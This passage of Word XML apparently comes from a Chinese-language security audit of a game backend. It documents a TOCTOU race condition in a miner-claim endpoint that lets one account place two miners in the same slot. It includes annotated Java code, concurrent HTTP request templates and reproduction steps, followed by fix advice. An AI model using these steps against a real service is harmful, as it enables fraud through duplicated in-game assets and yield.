      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>findByUserIdAndSlotIdAndInStorage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（非锁定读）仍使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>创建于 t_view 的旧快照</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，无法看到 T1 刚提交的矿机记录，从而判定目标坑位为空并再次插入——最终</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>同一坑位被放入两台矿机</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坑位 1-6 不受影响</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">：因 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>slotId &lt;= 6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 时短路跳过了 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>userSlotUnlockRepository.findByUserIdAndSlotId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，坑位检查成为事务内首次非锁定读，此时 T1 已提交，ReadView 包含最新数据，T2 能正常看到 T1 的矿机。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/api/miner/claimPending</w:t>
              <w:br/>
              <w:t xml:space="preserve">  → TokenAuthFilter：验证 Bearer Token，注入 userId（安全可信）</w:t>
              <w:br/>
              <w:t xml:space="preserve">  → SignAuthTestFilter：校验签名（攻击者持有合法账号可正常生成签名）</w:t>
              <w:br/>
              <w:t xml:space="preserve">  → MinerController.claimPending：透传 slotId、recordId</w:t>
              <w:br/>
              <w:t xml:space="preserve">  → PendingMinerService.claim：</w:t>
              <w:br/>
              <w:t xml:space="preserve">      ① findByIdAndUserIdForUpdate(recordId, userId)   ← 锁定记录（locking read，不建立 ReadView）</w:t>
              <w:br/>
              <w:t xml:space="preserve">      ② userSlotUnlockRepository.findByUserIdAndSlotId  ← [仅坑位7-9] 首次非锁定读，ReadView 在此建立</w:t>
              <w:br/>
              <w:t xml:space="preserve">      ③ findByUserIdAndInStorageForUpdate(userId, 0)   ← T2 在此被 T1 行锁阻塞；T1 提交后 T2 解阻</w:t>
              <w:br/>
              <w:t xml:space="preserve">      ④ findByUserIdAndSlotIdAndInStorage(userId,slotId,0) ← 非锁定读，使用步骤②的旧 ReadView → 看不见 T1 的矿机 → 漏洞点</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">      ⑤ userMinerRepository.save(miner)               ← 插入第二台矿机到同一坑位</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ClaimPendingForm 字段（攻击者可控）：</w:t>
              <w:br/>
              <w:t>//   Integer slotId;   ← 目标坑位（攻击者两次请求均传相同值，如 slotId=8）</w:t>
              <w:br/>
              <w:t>//   Long    recordId; ← 每次使用不同的合法 pending 记录 ID</w:t>
              <w:br/>
              <w:t>@PostMapping("/claimPending")</w:t>
              <w:br/>
              <w:t>public ApiResponse&lt;Void&gt; claimPending(@CurrentUserId Long userId,   // ← 来自 Token，不可伪造</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                      @RequestBody ClaimPendingForm form) {  // ← HTTP 可控入口</w:t>
              <w:br/>
              <w:t xml:space="preserve">    pendingMinerService.claim(userId, form.getSlotId(), form.getRecordId()); // ← 污点传入 service</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return ApiResponse.success();</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ② 漏洞核心：PendingMinerService.java # claim</w:t>
              <w:br/>
              <w:t>@Transactional</w:t>
              <w:br/>
              <w:t>public UserMiner claim(Long userId, Integer slotId, Long recordId) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    PendingMinerReward record = pendingMinerRewardRepository</w:t>
              <w:br/>
              <w:t xml:space="preserve">            .findByIdAndUserIdForUpdate(recordId, userId)       // ← locking read，不建立 ReadView</w:t>
              <w:br/>
              <w:t xml:space="preserve">            .orElseThrow(...);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // ↓ 仅当 slotId &gt; 6 时执行：首次非锁定读，此刻建立 T2 的 MVCC 快照（ReadView @ t_view）</w:t>
              <w:br/>
              <w:t xml:space="preserve">    boolean slotUnlocked = slotId &lt;= 6 || userSlotUnlockRepository</w:t>
              <w:br/>
              <w:t xml:space="preserve">            .findByUserIdAndSlotId(userId, slotId)              // ← [坑位7-9] T2 的 ReadView 在此建立</w:t>
              <w:br/>
              <w:t xml:space="preserve">            .map(u -&gt; u.getIsUnlocked() != null &amp;&amp; u.getIsUnlocked() == 1)</w:t>
              <w:br/>
              <w:t xml:space="preserve">            .orElse(false);</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    // ↓ T2 在此被 T1 持有的行锁阻塞；T1 完成 save 后提交（t1_commit &gt; t_view），T2 解阻</w:t>
              <w:br/>
              <w:t xml:space="preserve">    userMinerRepository.findByUserIdAndInStorageForUpdate(userId, 0); // ← T2 阻塞点</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    // ↓ 非锁定读，复用 t_view 旧快照 → T1 提交的矿机对 T2 不可见 → 漏洞点</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (userMinerRepository.findByUserIdAndSlotIdAndInStorage(userId, slotId, 0).isPresent()) {</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">        throw ne</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>w IllegalArgumentException("该坑位已有矿机");  // ← T2 错误地走不到这里</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    UserMiner miner = new UserMiner();</w:t>
              <w:br/>
              <w:t xml:space="preserve">    miner.setUserId(userId);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    miner.setMinerLevel(record.getMinerLevel());</w:t>
              <w:br/>
              <w:t xml:space="preserve">    miner.setSlotId(slotId);          // ← 与 T1 插入的矿机坑位相同</w:t>
              <w:br/>
              <w:t xml:space="preserve">    miner.setInStorage(0);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    userMinerRepository.save(miner);  // ← 第二台矿机被插入同一坑位，触发重复矿机漏洞</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前提条件：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="652"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>攻击者已登录（持有有效 Bearer Token）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="653"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>账号已解锁坑位 8（或 7/9）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="654"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">账号在坑位 1-6 中至少有 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>1 台</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">在役矿机（使 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>findByUserIdAndInStorageForUpdate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 产生行锁，迫使 T2 阻塞等待 T1）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="655"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">账号有 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>2 条</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>状态为 PENDING 的 pending 记录（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>recordId=&lt;id1&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 与 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>recordId=&lt;id2&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="656"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>坑位 8 当前无矿机</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>同时发送以下两个请求（使用多线程或并发工具如 Burp Suite Turbo Intruder / curl --parallel）：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A（T1）</w:t>
              <w:br/>
              <w:t>POST /api/miner/claimPending HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: &lt;target&gt;</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;攻击者合法Token&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:t>X-App-Key: &lt;appKey&gt;</w:t>
              <w:br/>
              <w:t>X-Timestamp: &lt;timestamp&gt;</w:t>
              <w:br/>
              <w:t>X-Nonce: &lt;nonce_a&gt;</w:t>
              <w:br/>
              <w:t>X-Sign: &lt;合法签名_a&gt;</w:t>
              <w:br/>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>{"slotId": 8, "recordId": &lt;id1&gt;}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B（T2，与请求 A 并发发送）</w:t>
              <w:br/>
              <w:t>POST /api/miner/claimPending HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: &lt;target&gt;</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;攻击者合法Token&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:t>X-App-Key: &lt;appKey&gt;</w:t>
              <w:br/>
              <w:t>X-Timestamp: &lt;timestamp&gt;</w:t>
              <w:br/>
              <w:t>X-Nonce: &lt;nonce_b&gt;</w:t>
              <w:br/>
              <w:t>X-Sign: &lt;合法签名_b&gt;</w:t>
              <w:br/>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>{"slotId": 8, "recordId": &lt;id2&gt;}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657"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>准备条件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：确认账号坑位 8 已解锁，坑位 1 已有矿机（提供行锁依赖），记录两条 PENDING 状态的 pending 记录 ID（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>id1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>id2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="658"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>并发发送</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：使用 Burp Suite Turbo Intruder、ab、或自定义多线程脚本，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>同时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">发出上述两个请求，确保 T2 的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>userSlotUnlockRepository.findByUserIdAndSlotId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（步骤②）早于 T1 提交，T2 再被 T1 行锁阻塞（步骤③）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="659"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>观察结果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">：两个请求均返回 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>200 success</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">；查询账号在坑位 8 的矿机数量——正常情况应为 1，若竞态触发则为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（两台矿机同处坑位 8）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="660"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>经济影响验证</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：检查挖矿算力/收益是否翻倍——两台矿机均计入算力时，该坑位产出为正常的 2 倍。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="661"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>重复利用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：可对坑位 7、9 重复上述步骤，进一步叠加异常经济收益。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662"/>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（需要有效 Bearer Token + 合法请求签名）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="663"/>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普通用户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，但需已付费/达成解锁坑位 7-9 的游戏条件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修复建议方向（供参考，非审计结论）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>核心问题在于坑位存在性检查使用了非锁定读。应将：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userMinerRepository.findByUserIdAndSlotIdAndInStorage(userId, slotId, 0)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">替换为带 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>FOR UPDATE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的锁定读版本，确保在 MySQL REPEATABLE READ 下强制读取最新提交数据（current read），从而绕过 MVCC 旧快照问题。同时建议在数据库层面对 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>(user_id, slot_id)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 加唯一索引作为兜底防线。</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664"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>MinerController.java.claimPending → PendingMinerService.java.claim → UserMinerRepository.java.findByUserIdAndSlotIdAndInStorage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audit_m157_571_claimPending_ctrl-path4of19.md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：PendingMinerService.java#claim</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:name="heading_30" w:id="30"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>漏洞29：TOCTOU 竞态条件 —— 并发 Claim 致同一解锁坑位（7-9）重复放置矿机</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="66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：并发领取竞态条件 —— MVCC 快照旧读导致解锁坑位（slotId 7-9）重复放置矿机</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="66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src/main/java/com/gameBack/mjservice/service/PendingMinerService.java:claim</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="66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：业务逻辑安全 / 并发竞态（TOCTOU）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="66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66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：普通用户（需有效 Bearer Token + 合法请求签名）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="67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claim()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 方法为防止并发重复放入同一坑位，使用了如下两步串行化方案：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① userMinerRepository.findByUserIdAndInStorageForUpdate(userId, 0)   // SELECT...FOR UPDATE，锁定已有矿机行</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">  ② userMinerRepository.findByUserIdAndSlotIdAndInStorage(userId, slotId, 0)  // 普通 SELECT，检查坑位是否已占</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
